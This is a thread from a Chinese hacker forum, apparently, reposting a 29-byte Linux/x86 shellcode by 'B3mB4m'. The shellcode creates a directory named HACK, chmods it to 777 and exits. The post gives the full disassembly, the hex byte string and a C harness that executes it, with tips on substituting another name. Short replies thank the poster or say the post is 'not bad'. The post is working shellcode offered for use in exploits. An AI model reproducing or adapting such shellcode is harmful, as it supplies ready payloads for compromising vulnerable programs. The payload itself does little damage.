90_ 发表于 2015-6-26 19:35:21

Linux/x86 - mkdir HACK & chmod 777 and exit(0) - 29 Bytes

#Greetz : Bomberman(Leader)
#Author : B3mB4m
 
 
#Auxiliary tools (50% time gain !)
#https://github.com/b3mb4m/Shellcode/blob/master/Auxiliary/convertstack.py
#https://github.com/b3mb4m/Shellcode/blob/master/Auxiliary/ASMtoShellcode.py
 
 
Disassembly of section .text:
 
08048060 <.text>:
 8048060:   31 c0                   xor    %eax,%eax
 8048062:   50                      push   %eax
 8048063:   68 48 41 43 4b          push   $0x4b434148  #You can change it !
 8048068:   b0 27                   mov    $0x27,%al
 804806a:   89 e3                   mov    %esp,%ebx
 804806c:   66 41                   inc    %cx
 804806e:   cd 80                   int    $0x80
 8048070:   b0 0f                   mov    $0xf,%al
 8048072:   66 b9 ff 01             mov    $0x1ff,%cx
 8048076:   cd 80                   int    $0x80
 8048078:   31 c0                   xor    %eax,%eax
 804807a:   40                      inc    %eax
 804807b:   cd 80                   int    $0x80
 
 
#include <stdio.h>
#include <string.h>
 
char *shellcode =
"\x31\xc0\x50\x68\x48\x41\x43\x4b\xb0\x27\x89\xe3\x66\x41\xcd\x80\xb0\x0f\x66\xb9\xff\x01\xcd\x80\x31\xc0\x40\xcd\x80";
 
 
//First push always start with byte 68.Also mov b0.
//Than just push your string between byte 68 - b0 ! :)
//Here it is -> \x68   "\x48\x41\x43\x4b\"    xb0     GOODLUCK !
 
 
int main(void){
    fprintf(stdout,"Length: %d\n",strlen(shellcode));
    (*(void(*)()) shellcode)();}

perble 发表于 2015-6-26 20:14:24

还是不错的哦,顶了

H.U.C-麦麦 发表于 2015-6-26 20:23:23

还是不错的哦,顶了

小路 发表于 2015-6-26 23:51:20

还是不错的哦,顶了

54hacker 发表于 2015-6-27 03:20:44

感谢楼主的分享~

Micah 发表于 2015-6-27 12:21:42

还是不错的哦,顶了

arctic 发表于 2015-6-27 13:35:35

支持中国红客联盟(ihonker.org)

cl476874045 发表于 2015-6-27 20:27:29

感谢楼主的分享~

人=族 发表于 2015-6-27 21:24:20

这个是什么

r00tc4 发表于 2015-6-28 14:15:24

支持,看起来不错呢!
页: [1]
查看完整版本: Linux/x86 - mkdir HACK & chmod 777 and exit(0) - 29 Bytes